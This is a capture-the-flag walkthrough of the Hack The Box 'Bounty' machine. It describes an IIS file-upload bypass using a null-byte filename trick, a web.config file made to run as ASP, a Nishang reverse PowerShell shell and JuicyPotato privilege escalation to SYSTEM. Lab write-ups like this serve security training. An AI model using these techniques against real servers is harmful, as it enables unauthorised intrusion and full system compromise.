Bounty HTB Walkthrough

Matthew

1. Enumeration

Standard nmap enumeration on TCP ports

And here we have a wizard on the homepage, with no other UIs except the image

Looks like we will need to run dirbuster to brute force directories. Since the service is Microsoft IIS, we will be looking at aspx, asp files on top of the standard txt and php files.

So we have uploadedfiles which is forbidden, perhaps we can upload and then access it or something. Only transfer.aspx is available, so let’s go into that.

Ah. File upload. Looks like this is the only way in. But before that we might need to figure out how to open the file we will be uploading to the server

Well this is the only way, not through uploadedFiles directory though. Let’s try uploading another image file

I downloaded an apple image and named it test.jpeg

Upload had no issues

Well, /test.jpeg did not work, but it’s not entirely a bad thing

Because /uploadedfiles/test.jpeg worked! Great. Now we can try uploading a shell, as an aspx file

We use msfvenom to create a shell.aspx

Oh no. It did not work. Maybe we can intercept and modify to packet to trick the server it is an image file. To do this, we require the services of Burp.

So over here, we modify it from shell.aspx to shell.aspx%00.jpg to trick the server into thinking it is an image file

And our trick worked, now we should be able to run the shell and catch the incoming connection with netcat

Or so i thought it will be this easy. So looks like the file caused a server error, means we need to file other files to possibly upload

2. Exploitation

A google search on IIS File upload exploit reveals this link https://soroush.secproject.com/blog/tag/unrestricted-file-upload/

One such header is titled “Running web.config as an ASP file”

Looks like we can upload shells as a web.config file instead

This is the web.config file on the website

Now if it works, 3 will appear on the webpage!

And so we know it’s correct! Now because we know this machine is a Windows machine from nmap enumeration, we can run Nishang powershell in order to invoke a reverse shell that will return a powershell for us!

This is the one we require

Here are examples in the script to show you how to use it

We want to run the ps1 file as we transfer it, so we add “Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <port> ” to the last line

Replace the ASP from web.config to the one above

Remember to start a python server

And we get a shell, the PS at the back signifies that we are in a powershell

3. Privilege Escalation

so checking whoami reveal that we need to escalate privileges. And when we do whoami /priv to check for privileges, we see that SeImpersonatePrivilege is Enabled. Now when SeImpersonatePrivilege is enabled, it means we can use this script called JuicyPotato

https://github.com/ohpe/juicy-potato

Juicy Potato is a Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. The summary and details are found in the Github link above!

Next we transfer the executable file

We run it to get usage. You can see that it requires 3 arguments, -t, -p and -l

The program we want to launch will probably be a reverse shell, as any program it runs will be on system privileges. we will leave * for -t and the listening port will be the listening port we define in the reverse shell. For the rest we will leave it as default unless the exploit does not work, then perhaps we might need to find the CLSID for this machine.

So now the reverse shell. We would require a program in the victim’s machine that is to be executed in order for our exploit to work. And for programs in Windows, we shall use a .bat file which will consist of our reverse shell script, and by reverse shell, i mean nishang powershell.ps1 which we have used earlier, except the port number changes!

The same script, but different port. So now -l will be 5555

Our shell.bat file is relatively simple, it is simple to invoke the powershell to retrieve the file and run the powershell

Now we retrieve the bat file

Prep our listener

And we run our exploit!

Since there were no errors with our CLSID, it looks like we will have a successful connection.

And indeed we have, and it’s nt authority\system which confirms our successful exploit!

User.txt, notice we use attrib because “dir” did not show any results, but we know for sure user.txt is in this folder as always. Except this time it is hidden

And root.txt

Overall quite the tedious machine, but the greatest takeaway any reader should have by this point should be:

  1. Microsoft IIS -> aspx, asp files becomes important here
  2. Based on the software, if file upload is possible check for file upload exploits based on the software/platform
  3. Use JuicyPotato when SeImpersonatePrivilege is enabled.
  4. Optional: Find out as many CLSID for as many types of Windows machine -> It should be useful. http://ohpe.it/juicy-potato/CLSID/

Till the next machine. On a side note, it’s only 2 weeks before D-Day. Can’t wait to see the fruits of my labour! 😀

Published by Matthew

Currently a final (fourth) year student in NUS (National University of Singapore) and an intern in GOVTECH Singapore. (Will be ending in early Dec sobs. T_T) , major in Information Security and thinking about whether or not to minor in Forensic Science. (YES. It's a vast difference) [EDIT: I decided not to minor in Forensic Science for no particular reason. Really.]